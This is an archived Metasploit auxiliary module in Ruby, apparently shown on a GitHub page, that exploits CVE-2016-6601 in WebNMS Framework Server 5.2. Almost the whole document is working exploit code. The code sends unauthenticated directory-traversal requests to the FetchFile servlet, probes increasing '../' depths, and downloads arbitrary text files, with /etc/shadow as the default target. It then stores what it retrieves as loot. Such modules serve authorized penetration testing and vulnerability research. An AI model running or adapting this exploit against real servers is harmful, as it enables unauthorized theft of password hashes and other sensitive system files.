-
Notifications
You must be signed in to change notification settings - Fork 167
/
webnms_file_download.rb
100 lines (88 loc) · 3.18 KB
/
webnms_file_download.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# NOTE !!!
# This exploit is kept here for archiving purposes only.
# Please refer to and use the version that has been accepted into the Metasploit framework.
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'WebNMS Framework Server Arbitrary Text File Download',
'Description' => %q{
This module abuses a vulnerability in WebNMS Framework Server 5.2 that allows an
unauthenticated user to download files off the file system by using a directory
traversal attack on the FetchFile servlet.
Note that only text files can be downloaded properly, as any binary file will get
mangled by the servlet. Also note that for Windows targets you can only download
files that are in the same drive as the WebNMS installation.
This module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on
Windows and Linux.
},
'Author' =>
[
'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2016-6601' ],
[ 'URL', 'https://blogs.securiteam.com/index.php/archives/2712' ],
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/webnms-5.2-sp1-pwn.txt']
],
'DisclosureDate' => 'Jul 4 2016'))
register_options(
[
OptPort.new('RPORT', [true, 'The target port', 9090]),
OptString.new('TARGETURI', [ true, "WebNMS path", '/']),
OptString.new('FILEPATH', [ false, "The filepath of the file you want to download", '/etc/shadow']),
OptString.new('TRAVERSAL_PATH', [ false, "The traversal path to the target file (if you know it)"]),
OptInt.new('MAX_TRAVERSAL', [ false, "Maximum traversal path depth (if you don't know the traversal path)", 10]),
], self.class)
end
def run
file = nil
if datastore['TRAVERSAL_PATH'] == nil
traversal_size = datastore['MAX_TRAVERSAL']
while traversal_size > 0
file = get_file("../" * traversal_size + datastore['FILEPATH'])
if file != nil
break
end
traversal_size -= 1
end
else
file = get_file(datastore['TRAVERSAL_PATH'])
end
if file == nil
print_error("#{peer} - Failed to download the specified file.")
return
else
vprint_line(file)
fname = File.basename(datastore['FILEPATH'])
path = store_loot(
'webnms.http',
'text/plain',
datastore['RHOST'],
file,
fname
)
print_good("File download successful, file saved in #{path}")
end
end
def get_file(path)
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'servlets', 'FetchFile'),
'method' =>'GET',
'vars_get' => { 'fileName' => path }
})
if res && res.code == 200 && res.body.to_s.length > 0 && res.body.to_s =~ /File Found/
return res.body.to_s
else
return nil
end
end
end